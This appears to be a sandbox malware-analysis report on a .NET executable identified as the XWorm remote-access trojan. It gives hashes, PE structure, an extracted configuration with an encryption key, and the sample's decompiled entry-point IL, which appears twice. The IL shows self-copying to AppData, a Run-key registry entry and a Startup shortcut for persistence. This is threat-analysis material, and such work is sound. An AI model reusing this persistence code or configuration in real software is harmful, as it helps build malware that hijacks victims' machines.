Malicious
Malicious

41e0dc39cc6da98fa73b25326c3cf6a3

PE Executable
|
MD5: 41e0dc39cc6da98fa73b25326c3cf6a3
|
Size: 58.88 KB
|
application/x-dosexec

Print
Infection Chain
Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Very high

Hash
 Hash Value
MD5
41e0dc39cc6da98fa73b25326c3cf6a3
Sha1
81c8ca8881a4b44e57df5d39d51f5eacdbdd0769
Sha256
402dfcad45c1accc395ec18cc56d4dae549f30dfe251bdfbd556d7de42ecdb40
Sha384
75c37680c417c6d1ddc3572fd2c5833c4ca5e75be78525ee0c846b8620898ac0ff64383de74c3e2975509b50be92fd99
Sha512
7983cb5a9af5686e678029418a57d6bae3675bf4d2cc5325ffb87b0b8bc4d6ff02dd13a25d306b3b56eb40e982194dc66373d4f3881239a5911b34f44f701271
SSDeep
1536:mWOYjOFEjXQYoXegGGI20rFcbFZbfZLu6ajV8Ot+Ji:mWmFEGYGo2FZbfYj2OtQi
TLSH
EC437C287BE58465D1FF6BB11DE66392D735F3534A13D72F28C8028A1623E88CE417E6

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
41e0dc39cc6da98fa73b25326c3cf6a3
Malicious
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Malware Configuration - XWorm config.
Config. Field
 Value
Mutex

%AppData%
KEY

lqj1ghD4UfxKYEVTnPFciWkKtiCEdJOP6l6U9ppBbUg=
USBNM

+dQ2sjele9Eu6ywAwitLqQ==
LoggerPath

%AppData%
family

xworm
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Module Name

velocityy.exe
Full Name

velocityy.exe
EntryPoint

System.Void Stub.Rog5rBpH8I6bNGS::CkrfZtAmR0Ci5Im()
Scope Name

velocityy.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

velocityy
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

291
Main Method

System.Void Stub.Rog5rBpH8I6bNGS::CkrfZtAmR0Ci5Im()
Main IL Instruction Count

238
Main IL

ldsfld System.Int32 8GITZsOVmKXY6qH::Z4fYgE0SQGCSPhY ldc.i4 1000 mul.ovf <null> call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.String 8GITZsOVmKXY6qH::CcP71JEUBKopuXK call System.Object Stub.6VnlGCkDfVrjqQp::Y4gw1JQwWArgsVu(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String 8GITZsOVmKXY6qH::CcP71JEUBKopuXK ldsfld System.String 8GITZsOVmKXY6qH::Q3Fy2Zbyo9oE3At call System.Object Stub.6VnlGCkDfVrjqQp::Y4gw1JQwWArgsVu(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String 8GITZsOVmKXY6qH::Q3Fy2Zbyo9oE3At ldsfld System.String 8GITZsOVmKXY6qH::Yoxderdae0q7wf1 call System.Object Stub.6VnlGCkDfVrjqQp::Y4gw1JQwWArgsVu(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String 8GITZsOVmKXY6qH::Yoxderdae0q7wf1 ldsfld System.String 8GITZsOVmKXY6qH::C28YJ8NT7ZaO8wy call System.Object Stub.6VnlGCkDfVrjqQp::Y4gw1JQwWArgsVu(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String 8GITZsOVmKXY6qH::C28YJ8NT7ZaO8wy ldsfld System.String 8GITZsOVmKXY6qH::ZXbL9hlNrx4JmJm call System.Object Stub.6VnlGCkDfVrjqQp::Y4gw1JQwWArgsVu(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String 8GITZsOVmKXY6qH::ZXbL9hlNrx4JmJm ldsfld System.String 8GITZsOVmKXY6qH::fZTZu0BxqVhtjfu call System.String System.Environment::ExpandEnvironmentVariables(System.String) stsfld System.String 8GITZsOVmKXY6qH::fZTZu0BxqVhtjfu leave.s IL_0099: call System.Boolean Stub.MoITjfn3z5F5x1u::p4PUSNoTqhYpYOc() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.2 <null> ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0099: call System.Boolean Stub.MoITjfn3z5F5x1u::p4PUSNoTqhYpYOc() call System.Boolean Stub.MoITjfn3z5F5x1u::p4PUSNoTqhYpYOc() brtrue.s IL_00A6: call System.Void Stub.Rog5rBpH8I6bNGS::3EbrJAlpE7mRGX3() ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Stub.Rog5rBpH8I6bNGS::3EbrJAlpE7mRGX3() ldsfld System.String 8GITZsOVmKXY6qH::fZTZu0BxqVhtjfu ldstr \ ldsfld System.String Stub.MoITjfn3z5F5x1u::sPcXUZexprDRZpb call System.String System.IO.Path::GetFileName(System.String) call System.String System.String::Concat(System.String,System.String,System.String) stloc.3 <null> call My.2xJRrBobBiw9erl My.DJ9HXo7wSxu0EFq::j9oHmbuP7GICBwc() callvirt Microsoft.VisualBasic.MyServices.RegistryProxy Microsoft.VisualBasic.Devices.ServerComputer::get_Registry() callvirt Microsoft.Win32.RegistryKey Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser() ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) ldsfld System.String Stub.MoITjfn3z5F5x1u::sPcXUZexprDRZpb call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldloc.3 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) ldloc.3 <null> call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0106: ldc.i4 1000 ldloc.3 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_4 ldloc.s V_4 callvirt System.Void System.IO.FileInfo::Delete() ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.3 <null> ldsfld System.String Stub.MoITjfn3z5F5x1u::sPcXUZexprDRZpb call System.Byte[] System.IO.File::ReadAllBytes(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) leave.s IL_0131: leave.s IL_0142 dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_5 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0131: leave.s IL_0142 leave.s IL_0142: ldsfld System.String 8GITZsOVmKXY6qH::fZTZu0BxqVhtjfu dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_6 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0142: ldsfld System.String 8GITZsOVmKXY6qH::fZTZu0BxqVhtjfu ldsfld System.String 8GITZsOVmKXY6qH::fZTZu0BxqVhtjfu ldstr \ ldsfld System.String Stub.MoITjfn3z5F5x1u::sPcXUZexprDRZpb call System.String System.IO.Path::GetFileName(System.String) call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_7 ldloc.s V_7 call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0176: ldc.i4 1000 ldloc.s V_7 newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_9 ldloc.s V_9 callvirt System.Void System.IO.FileInfo::Delete() ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.s V_7 ldsfld System.String Stub.MoITjfn3z5F5x1u::sPcXUZexprDRZpb call System.Byte[] System.IO.File::ReadAllBytes(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) leave.s IL_01A2: ldc.i4.7 dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_10 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_01A2: ldc.i4.7 ldc.i4.7 <null> call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr \ ldsfld System.String Stub.MoITjfn3z5F5x1u::sPcXUZexprDRZpb call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldstr .lnk call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_8 ldstr WScript.Shell ldstr call System.Object Microsoft.VisualBasic.Interaction::CreateObject(System.String,System.String) ldnull <null> ldstr CreateShortcut ldc.i4.1 <null> newarr System.Object stloc.s V_12 ldloc.s V_12 ldc.i4.0 <null> ldloc.s V_8 stelem.ref <null> ldloc.s V_12 stloc.s V_13 ldloc.s V_13 ldnull <null> ldnull <null> ldc.i4.1 <null> newarr System.Boolean stloc.s V_14 ldloc.s V_14 ldc.i4.0 <null> ldc.i4.1 <null> stelem.i1 <null> ldloc.s V_14 call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateGet(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[]) ldloc.s V_14 ldc.i4.0 <null> ldelem.i1 <null> brfalse.s IL_0227: stloc.s V_15 ldloc.s V_13 ldc.i4.0 <null> ldelem.ref <null> call System.Object System.Runtime.CompilerServices.RuntimeHelpers::GetObjectValue(System.Object) ldtoken System.String call System.Type System.Type::GetTypeFromHandle(System.RuntimeTypeHandle) call System.Object Microsoft.VisualBasic.CompilerServices.Conversions::ChangeType(System.Object,System.Type) castclass System.String stloc.s V_8 stloc.s V_15 ldloc.s V_15 ldnull <null> ldstr TargetPath ldc.i4.1 <null> newarr System.Object stloc.s V_16 ldloc.s V_16 ldc.i4.0 <null> ldloc.s V_7 stelem.ref <null> ldloc.s V_16 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_15 ldnull <null> ldstr WorkingDirectory ldc.i4.1 <null> newarr System.Object stloc.s V_16 ldloc.s V_16 ldc.i4.0 <null> ldstr stelem.ref <null> ldloc.s V_16 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_15 ldnull <null> ldstr Save ldc.i4.0 <null> newarr System.Object ldnull <null> ldnull <null> ldnull <null> ldc.i4.1 <null> call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateCall(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[],System.Boolean) pop <null> ldnull <null> stloc.s V_15 ldloc.s V_8 ldc.i4.3 <null> newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode) stsfld System.IO.FileStream Stub.MoITjfn3z5F5x1u::HhCvuz9TffrddBG leave.s IL_02A7: call System.Void Stub.MoITjfn3z5F5x1u::rTGjJt62FHeaQZl() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_11 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_02A7: call System.Void Stub.MoITjfn3z5F5x1u::rTGjJt62FHeaQZl() call System.Void Stub.MoITjfn3z5F5x1u::rTGjJt62FHeaQZl() ldnull <null> ldftn System.Void Stub.Rog5rBpH8I6bNGS::psBQVaCDeB0YMSp() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Threading.Thread::Start() call System.String Stub.0m1QLgQ4SgG5fKK::nm4HmOwgl634PxX() call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.String) brfalse.s IL_02D3: ldnull call System.Void Stub.1JraqPDCFXNEKDH::BAe9d7i9cviMBKS() ldnull <null> ldftn System.Void Stub.Rog5rBpH8I6bNGS::g3gbbqrfXvb6yN9() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.0 <null> ldnull <null> ldftn System.Void Stub.Rog5rBpH8I6bNGS::4j8YOXsSrNBCbzr() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.1 <null> ldloc.0 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.1 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.1 <null> callvirt System.Void System.Threading.Thread::Join() ret <null>
Module Name

velocityy.exe
Full Name

velocityy.exe
EntryPoint

System.Void Stub.Rog5rBpH8I6bNGS::CkrfZtAmR0Ci5Im()
Scope Name

velocityy.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

velocityy
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

291
Main Method

System.Void Stub.Rog5rBpH8I6bNGS::CkrfZtAmR0Ci5Im()
Main IL Instruction Count

238
Main IL

ldsfld System.Int32 8GITZsOVmKXY6qH::Z4fYgE0SQGCSPhY ldc.i4 1000 mul.ovf <null> call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.String 8GITZsOVmKXY6qH::CcP71JEUBKopuXK call System.Object Stub.6VnlGCkDfVrjqQp::Y4gw1JQwWArgsVu(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String 8GITZsOVmKXY6qH::CcP71JEUBKopuXK ldsfld System.String 8GITZsOVmKXY6qH::Q3Fy2Zbyo9oE3At call System.Object Stub.6VnlGCkDfVrjqQp::Y4gw1JQwWArgsVu(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String 8GITZsOVmKXY6qH::Q3Fy2Zbyo9oE3At ldsfld System.String 8GITZsOVmKXY6qH::Yoxderdae0q7wf1 call System.Object Stub.6VnlGCkDfVrjqQp::Y4gw1JQwWArgsVu(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String 8GITZsOVmKXY6qH::Yoxderdae0q7wf1 ldsfld System.String 8GITZsOVmKXY6qH::C28YJ8NT7ZaO8wy call System.Object Stub.6VnlGCkDfVrjqQp::Y4gw1JQwWArgsVu(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String 8GITZsOVmKXY6qH::C28YJ8NT7ZaO8wy ldsfld System.String 8GITZsOVmKXY6qH::ZXbL9hlNrx4JmJm call System.Object Stub.6VnlGCkDfVrjqQp::Y4gw1JQwWArgsVu(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String 8GITZsOVmKXY6qH::ZXbL9hlNrx4JmJm ldsfld System.String 8GITZsOVmKXY6qH::fZTZu0BxqVhtjfu call System.String System.Environment::ExpandEnvironmentVariables(System.String) stsfld System.String 8GITZsOVmKXY6qH::fZTZu0BxqVhtjfu leave.s IL_0099: call System.Boolean Stub.MoITjfn3z5F5x1u::p4PUSNoTqhYpYOc() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.2 <null> ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0099: call System.Boolean Stub.MoITjfn3z5F5x1u::p4PUSNoTqhYpYOc() call System.Boolean Stub.MoITjfn3z5F5x1u::p4PUSNoTqhYpYOc() brtrue.s IL_00A6: call System.Void Stub.Rog5rBpH8I6bNGS::3EbrJAlpE7mRGX3() ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Stub.Rog5rBpH8I6bNGS::3EbrJAlpE7mRGX3() ldsfld System.String 8GITZsOVmKXY6qH::fZTZu0BxqVhtjfu ldstr \ ldsfld System.String Stub.MoITjfn3z5F5x1u::sPcXUZexprDRZpb call System.String System.IO.Path::GetFileName(System.String) call System.String System.String::Concat(System.String,System.String,System.String) stloc.3 <null> call My.2xJRrBobBiw9erl My.DJ9HXo7wSxu0EFq::j9oHmbuP7GICBwc() callvirt Microsoft.VisualBasic.MyServices.RegistryProxy Microsoft.VisualBasic.Devices.ServerComputer::get_Registry() callvirt Microsoft.Win32.RegistryKey Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser() ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) ldsfld System.String Stub.MoITjfn3z5F5x1u::sPcXUZexprDRZpb call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldloc.3 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) ldloc.3 <null> call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0106: ldc.i4 1000 ldloc.3 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_4 ldloc.s V_4 callvirt System.Void System.IO.FileInfo::Delete() ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.3 <null> ldsfld System.String Stub.MoITjfn3z5F5x1u::sPcXUZexprDRZpb call System.Byte[] System.IO.File::ReadAllBytes(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) leave.s IL_0131: leave.s IL_0142 dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_5 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0131: leave.s IL_0142 leave.s IL_0142: ldsfld System.String 8GITZsOVmKXY6qH::fZTZu0BxqVhtjfu dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_6 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0142: ldsfld System.String 8GITZsOVmKXY6qH::fZTZu0BxqVhtjfu ldsfld System.String 8GITZsOVmKXY6qH::fZTZu0BxqVhtjfu ldstr \ ldsfld System.String Stub.MoITjfn3z5F5x1u::sPcXUZexprDRZpb call System.String System.IO.Path::GetFileName(System.String) call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_7 ldloc.s V_7 call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0176: ldc.i4 1000 ldloc.s V_7 newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_9 ldloc.s V_9 callvirt System.Void System.IO.FileInfo::Delete() ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.s V_7 ldsfld System.String Stub.MoITjfn3z5F5x1u::sPcXUZexprDRZpb call System.Byte[] System.IO.File::ReadAllBytes(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) leave.s IL_01A2: ldc.i4.7 dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_10 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_01A2: ldc.i4.7 ldc.i4.7 <null> call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr \ ldsfld System.String Stub.MoITjfn3z5F5x1u::sPcXUZexprDRZpb call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldstr .lnk call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_8 ldstr WScript.Shell ldstr call System.Object Microsoft.VisualBasic.Interaction::CreateObject(System.String,System.String) ldnull <null> ldstr CreateShortcut ldc.i4.1 <null> newarr System.Object stloc.s V_12 ldloc.s V_12 ldc.i4.0 <null> ldloc.s V_8 stelem.ref <null> ldloc.s V_12 stloc.s V_13 ldloc.s V_13 ldnull <null> ldnull <null> ldc.i4.1 <null> newarr System.Boolean stloc.s V_14 ldloc.s V_14 ldc.i4.0 <null> ldc.i4.1 <null> stelem.i1 <null> ldloc.s V_14 call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateGet(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[]) ldloc.s V_14 ldc.i4.0 <null> ldelem.i1 <null> brfalse.s IL_0227: stloc.s V_15 ldloc.s V_13 ldc.i4.0 <null> ldelem.ref <null> call System.Object System.Runtime.CompilerServices.RuntimeHelpers::GetObjectValue(System.Object) ldtoken System.String call System.Type System.Type::GetTypeFromHandle(System.RuntimeTypeHandle) call System.Object Microsoft.VisualBasic.CompilerServices.Conversions::ChangeType(System.Object,System.Type) castclass System.String stloc.s V_8 stloc.s V_15 ldloc.s V_15 ldnull <null> ldstr TargetPath ldc.i4.1 <null> newarr System.Object stloc.s V_16 ldloc.s V_16 ldc.i4.0 <null> ldloc.s V_7 stelem.ref <null> ldloc.s V_16 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_15 ldnull <null> ldstr WorkingDirectory ldc.i4.1 <null> newarr System.Object stloc.s V_16 ldloc.s V_16 ldc.i4.0 <null> ldstr stelem.ref <null> ldloc.s V_16 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_15 ldnull <null> ldstr Save ldc.i4.0 <null> newarr System.Object ldnull <null> ldnull <null> ldnull <null> ldc.i4.1 <null> call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateCall(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[],System.Boolean) pop <null> ldnull <null> stloc.s V_15 ldloc.s V_8 ldc.i4.3 <null> newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode) stsfld System.IO.FileStream Stub.MoITjfn3z5F5x1u::HhCvuz9TffrddBG leave.s IL_02A7: call System.Void Stub.MoITjfn3z5F5x1u::rTGjJt62FHeaQZl() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_11 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_02A7: call System.Void Stub.MoITjfn3z5F5x1u::rTGjJt62FHeaQZl() call System.Void Stub.MoITjfn3z5F5x1u::rTGjJt62FHeaQZl() ldnull <null> ldftn System.Void Stub.Rog5rBpH8I6bNGS::psBQVaCDeB0YMSp() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Threading.Thread::Start() call System.String Stub.0m1QLgQ4SgG5fKK::nm4HmOwgl634PxX() call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.String) brfalse.s IL_02D3: ldnull call System.Void Stub.1JraqPDCFXNEKDH::BAe9d7i9cviMBKS() ldnull <null> ldftn System.Void Stub.Rog5rBpH8I6bNGS::g3gbbqrfXvb6yN9() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.0 <null> ldnull <null> ldftn System.Void Stub.Rog5rBpH8I6bNGS::4j8YOXsSrNBCbzr() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.1 <null> ldloc.0 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.1 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.1 <null> callvirt System.Void System.Threading.Thread::Join() ret <null>
Artefacts
Name
 Value
Mutex

%AppData%
41e0dc39cc6da98fa73b25326c3cf6a3 (58.88 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙